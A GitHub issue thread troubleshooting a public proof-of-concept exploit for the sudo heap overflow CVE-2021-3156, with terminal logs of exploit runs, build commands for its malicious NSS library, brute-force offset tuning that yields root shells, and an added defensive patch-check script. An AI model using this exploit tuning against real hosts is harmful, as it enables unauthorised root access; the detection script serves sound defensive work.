Not working on my focal #1

Open
LyesH4ck opened this issue Jan 30, 2021 · 13 comments

Comments

@LyesH4ck

LyesH4ck commented Jan 30, 2021

Hello,

Tested on my fresh install of focal.

user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

user@ubuntu20:/TEST/CVE-2021-3156$ uname -a
Linux ubuntu20 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu20:/TEST/CVE-2021-3156$ ls
hax.c lib.c libnss_X Makefile README.md sudo-hax-me-a-sandwich
user@ubuntu20:/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
free(): invalid pointer
Aborted (core dumped)

user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I've tested your fuzz2.py but I'm not able to crash in process_hooks_getenv() or in nss_load_library()...
Only found an interesting crash in set_cmnd()...

@blasty
Owner

blasty commented Jan 31, 2021

Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.

@DixieDot1993 DixieDot1993 mentioned this issue Jan 31, 2021
@transparentdata243

same issue here. environment is same as above. Used a test user which is not in sudoers list.

@LyesH4ck
Author

LyesH4ck commented Jan 31, 2021

> Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.

test@ubuntu20:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

Ok it works ;)

When I use your fuzz2.py, I can't find a good crash in nss_load_library() or in process_hook_getenv().
Is that normal?
Maybe there's something I don't understand. I found a crash in set_cmnd()... It's the only interesting way I found.

Any hint?

Thank you!

@blasty
Owner

blasty commented Jan 31, 2021

@lyes06 Good to see you could get it working with a different user! fuzz2.py must be run as a user who has sudo rights (if you look in the script you can see it invokes sudo env -i ...). You have to be lucky to get some "nice" crashes with this fuzzer. I might rewrite that thing eventually, it can be made better(tm).

@PixiesPixel

It also doesn't work on my ubuntu 20.04

```
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty [email protected]

usage: ./sudo-hax-me-a-sandwich

available targets:

0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
$ id -a
uid=1001(test) gid=1001(test) groups=1001(test)
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.1 LTS
Release: 20.04
Codename: focal
```

@LyesH4ck
Author

LyesH4ck commented Feb 1, 2021

> It also doesn't work on my ubuntu 20.04
>
> ```
> $ ./sudo-hax-me-a-sandwich
>
> ** CVE-2021-3156 PoC by blasty [email protected]
>
> usage: ./sudo-hax-me-a-sandwich
>
> available targets:
>
> 0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
> 1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
>
> $ ./sudo-hax-me-a-sandwich 0
>
> ** CVE-2021-3156 PoC by blasty [email protected]
>
> using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
> ** pray for your rootshell.. **
> usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
> $ id -a
> uid=1001(test) gid=1001(test) groups=1001(test)
> $ lsb_release -a
> No LSB modules are available.
> Distributor ID: Ubuntu
> Description: Ubuntu 20.04.1 LTS
> Release: 20.04
> Codename: focal
> ```

You get the usage message, so I think your Ubuntu is patched.

Try this: `sudoedit -s '' perl -e 'print "A" x 65536'`

If you get usage information, you are patched.

@PixiesPixel

I haven't patched it yet, but you may be right.

$ sudoedit -s '' perl -e 'print "A" x 65536'
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..

@LyesH4ck
Author

LyesH4ck commented Feb 1, 2021

> I haven't patched it yet, but you may be right.
>
> $ sudoedit -s '' perl -e 'print "A" x 65536'
> usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..

I confirm, you are patched :)
Try to reinstall old sudo packages if you want to play with it ;)
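
An added example, not code from blasty's repository or from anyone in this thread: a small POSIX sh script that turns the "am I patched?" check discussed above into something you can run on a fleet. It uses the `sudoedit -s /` probe from the Qualys advisory rather than the thread's 65536-byte variant; both exercise the same `-s`-with-sudoedit combination that the fix rejects, so a patched front end answers with `usage:` either way, while an unpatched one answers with an error beginning `sudoedit:`. The version hint is deliberately secondary: the thread itself shows an Ubuntu 20.04 box reporting sudo 1.8.31 that was already patched by the distro, so only the behavioural probe is authoritative. The function names, verdict strings and the `--run` entry point are this example's own; the affected upstream ranges (1.8.2 to 1.8.31p2, 1.9.0 to 1.9.5p1) are the advisory's.

```shell
#!/bin/sh
# Added example (editor's own scaffolding, not code from blasty's repository).
# Two checks for CVE-2021-3156 on a host:
#   1. a version hint from `sudo --version`, which only says whether the upstream
#      release is in the affected range (distros backport the fix, so a 1.8.31
#      can be patched, as the thread shows), and
#   2. the behavioural probe from the Qualys advisory, `sudoedit -s /`, which is
#      authoritative: a patched front end rejects -s with sudoedit and prints
#      "usage:", an unpatched one prints an error starting with "sudoedit:".

# Classify one captured sudoedit response. Usage: classify_sudoedit_output "<text>"
classify_sudoedit_output() {
    case "$1" in
        usage:*)    echo patched ;;
        sudoedit:*) echo vulnerable ;;
        *)          echo unknown ;;
    esac
}

# Turn "Sudo version 1.8.31p2" into "MAJ MIN PAT PLEVEL" (PLEVEL is 0 without a pN suffix).
parse_sudo_version() {
    v=$(printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p')
    [ -n "$v" ] || return 1
    base=${v%%p*}
    if [ "$base" = "$v" ]; then plev=0; else plev=${v##*p}; fi
    maj=${base%%.*}
    rest=${base#*.}
    min=${rest%%.*}
    pat=${rest#*.}
    [ "$pat" != "$rest" ] || pat=0
    echo "$maj $min $pat $plev"
}

# Upstream-affected ranges (from the advisory): 1.8.2..1.8.31p2 and 1.9.0..1.9.5p1.
# The version is packed into one integer (maj*10^6 + min*10^4 + patch*100 + plevel)
# so the range checks are plain arithmetic.
upstream_version_hint() {
    parsed=$(parse_sudo_version "$1") || { echo unknown; return 0; }
    set -- $parsed
    n=$(( $1 * 1000000 + $2 * 10000 + $3 * 100 + $4 ))
    if   [ "$n" -ge 1080200 ] && [ "$n" -le 1083102 ]; then echo affected-upstream
    elif [ "$n" -ge 1090000 ] && [ "$n" -le 1090501 ]; then echo affected-upstream
    else echo outside-affected-range
    fi
}

# Run the probe on this host. Run it as an unprivileged user: blasty notes in the
# thread that a sudoers member takes a different path, and root proves nothing.
probe_host() {
    command -v sudoedit >/dev/null 2>&1 || { echo unknown; return 0; }
    if [ "$(id -u)" -eq 0 ]; then
        echo "probe_host: run this as an unprivileged test user, not root" >&2
        echo unknown
        return 0
    fi
    # -n suppresses any password prompt; both verdict strings arrive on stderr.
    # sudoedit exits non-zero in either case, so the failure is swallowed here.
    out=$(sudoedit -n -s / 2>&1 </dev/null) || true
    classify_sudoedit_output "$out"
}

# Stand-alone use: print both the hint and the probe verdict for this host.
if [ "${1:-}" = "--run" ]; then
    echo "version hint: $(upstream_version_hint "$(sudo --version 2>/dev/null | head -n1)")"
    echo "probe verdict: $(probe_host)"
fi
```

Save it as, say, `check-3156.sh` (the name is an assumption) and run `sh check-3156.sh --run` as a throwaway user that is not in sudoers; on a host like the one in the thread you should see `version hint: affected-upstream` next to `probe verdict: patched`, which is exactly the case where trusting the version string would have misled you. The probe passes `/` and no backslashes, so it never reaches the overflowing copy loop on a vulnerable box; it only tells you whether the front end still accepts the flag combination.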

@LyesH4ck
Author

LyesH4ck commented Feb 2, 2021

I deleted my last post to explain again the problem.

- Compilation with Make - No -DBRUTE option

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
'#'

- When I use the options used in brute.sh

$ make brute
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
[sudo] password for test:

And when I use just the printf() in lib.c, brute.sh freezes and stops.
But I don't know why...

@LyesH4ck
Author

LyesH4ck commented Feb 2, 2021

- When the sploit works

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
#

- When I use the same buf values with brute.sh

$ ./brute.sh 50 60 50 70 200 220
[+] cleaning up..
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
[+] generating possibilities..
[+] lets go..

Computers / CPU cores / Max jobs to run
1:local / 2 / 4

Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete
ETA: 0s Left: 693 AVG: 0.00s local:4/0/100%/0.0s NOPE
./brute.sh: line 13: 292375 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 692 AVG: 0.00s local:4/1/100%/1.0s NOPE
./brute.sh: line 13: 292361 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 691 AVG: 0.00s local:4/2/100%/0.5s NOPE
./brute.sh: line 13: 292368 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 690 AVG: 0.00s local:4/3/100%/0.3s NOPE
./brute.sh: line 13: 292369 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 689 AVG: 0.00s local:4/4/100%/0.2s NOPE
.......
.......
ETA: 0s Left: 4 AVG: 0.12s local:4/689/100%/0.1s NOPE
./brute.sh: line 13: 309687 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 3 AVG: 0.12s local:3/690/100%/0.1s NOPE
./brute.sh: line 13: 309721 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 2 AVG: 0.12s local:2/691/100%/0.1s NOPE
./brute.sh: line 13: 309737 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 1 AVG: 0.12s local:1/692/100%/0.1s NOPE
./brute.sh: line 13: 309762 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 0 AVG: 0.12s local:0/693/100%/0.1s
[+] done
[-] we didnt find any working candidates :(

@LyesH4ck
Author

LyesH4ck commented Feb 2, 2021

I modified your script brute.sh and deleted the /2 used in the script.
Now it works, but it freezes (ETA: 7287s).
I need to Ctrl-C to finish the execution. I don't know why the script is freezing...

ETA: 56s Left: 454 AVG: 0.13s local:4/239/100%/0.1s NOPE
./brute.sh: line 13: 354756 Segmentation fault ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 7287s Left: 450 AVG: 16.20s local:4/243/100%/16.2s ^C
[sudo] password for test:
[sudo] password for test:
[sudo] password for test:
[sudo] password for test:
[+] done
[+] we found some goodies (saved in success.txt):

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 200)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 210)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 220)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 200)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 210)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

CVE-2021-3156 PoC by blasty [email protected]

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 220)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!

@sha0coder

sha0coder commented Feb 9, 2021

Same vagrant ubuntu/focal64, same libc + sudo version (manually compiled), and it doesn't work; it doesn't even seem exploitable:
The "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 away at the nearest).
The user_args malloc fits well in the previous free, but it's still very far away. I have friends who hit the same situation.
Using non-sudoers users also doesn't work for me.
Probably the exploitation depends on other factors: RAM? locales? etc.
Blasty, does that make sense?

@jm33-m0

jm33-m0 commented Feb 10, 2021

> Same vagrant ubuntu/focal64, same libc + sudo version (manually compiled), and it doesn't work; it doesn't even seem exploitable:
> The "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 away at the nearest).
> The user_args malloc fits well in the previous free, but it's still very far away. I have friends who hit the same situation.
> Using non-sudoers users also doesn't work for me.
> Probably the exploitation depends on other factors: RAM? locales? etc.
> Blasty, does that make sense?

Same here, no luck with manually compiled sudo
